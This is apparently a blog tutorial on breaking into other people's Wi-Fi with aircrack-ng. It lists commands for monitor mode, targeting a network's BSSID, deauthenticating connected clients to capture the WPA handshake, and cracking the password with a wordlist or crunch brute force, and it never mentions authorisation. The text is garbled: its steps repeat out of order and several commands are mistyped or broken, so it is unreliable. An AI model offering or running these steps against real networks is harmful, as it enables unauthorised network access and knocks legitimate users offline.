Aircrack-ng
:Hacking Wifi using
:1:Aircrack-ng the best Wi-Fi hacking suite
Step 3)
(airmon-ng start wlan0):-Now this command will enable the monitor mode on the wifi card. So while using interface in any terminal or command line use wlan0mon.
step 5):-
In this step we will add some parameters to airodump-ng.
Here, <CH> is channel number
<Targer Bssid> is choose your target wifi bssid or mac id
command is airodump-ng wlan0mon -c <CH> --bssid <Target Bssid>
.......................................................................................................................
OR airodump-ng -c<??> --bssid <??> -w /root/Desktop/hack wlan0mon
........................................................................................................................
and press enter
Here, if you use -w /root/Desktop/hack wlan0mon ,Then new 6 files will apper in your Desktop as showing in this figure:::)
Hope you guys understand::)
Step-6)-
In this step we deauthenticate the connected clients to the Wi-Fi.
The command is aireplay-ng –deauth 10 -a [router bssid] interface
In the above command it is optional to give the client mac address it is given by -c <client mac>
This will disconnects the client from access point.
Screen shot of a client connected to access point.
Notice in the top line to the far right, airodump-ng says "WPA handshake." This is the way it tells us we were successful in grabbing the encrypted password! That is the first step to success!
Step-7)-
:1:Aircrack-ng the best Wi-Fi hacking suite
(airmon-ng start wlan0):-Now this command will enable the monitor mode on the wifi card. So while using interface in any terminal or command line use wlan0mon.
Note:You should use the interface which is indicated with red mark.
step-4)
Now we search Wifi in our area. To find BSSID:-
type:(airodump-ng wla0mon) This type of interface will be shown:-
step 5):-
In this step we will add some parameters to airodump-ng.
Here, <CH> is channel number
<Targer Bssid> is choose your target wifi bssid or mac id
command is airodump-ng wlan0mon -c <CH> --bssid <Target Bssid>
.......................................................................................................................
OR airodump-ng -c<??> --bssid <??> -w /root/Desktop/hack wlan0mon
........................................................................................................................
and press enter
Here, if you use -w /root/Desktop/hack wlan0mon ,Then new 6 files will apper in your Desktop as showing in this figure:::)
Hope you guys understand::)
Step-6)-
In this step we deauthenticate the connected clients to the Wi-Fi.
The command is aireplay-ng –deauth 10 -a [router bssid] interface
In the above command it is optional to give the client mac address it is given by -c <client mac>
This will disconnects the client from access point.
Screen shot of a client connected to access point.
Notice in the top line to the far right, airodump-ng says "WPA handshake." This is the way it tells us we were successful in grabbing the encrypted password! That is the first step to success!
Step-7)-
Let's Aircrack-Ng That Password!
Now that we have the encrypted password in our file WPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the default password list included with aircrack-ng.
If you don't have password list you need a fast pc/laptop to crack Password.
Just like Eg: crunch 10 10 -t %%%%%%%%%% | aircrack-ng -w -capture-<taht 6 file there is .capfile
aircrack-ng -b [bssid of router] -w [path to word list] [path to capture packets]
-w path to word list in my case it is ‘/root/Desktop/wordlist.txt’
Video will be Comming soon::::::::::::::::::::::::::::)
Don't Look at picture:
...........................THANK FOR VISITNG US..........................
No comments: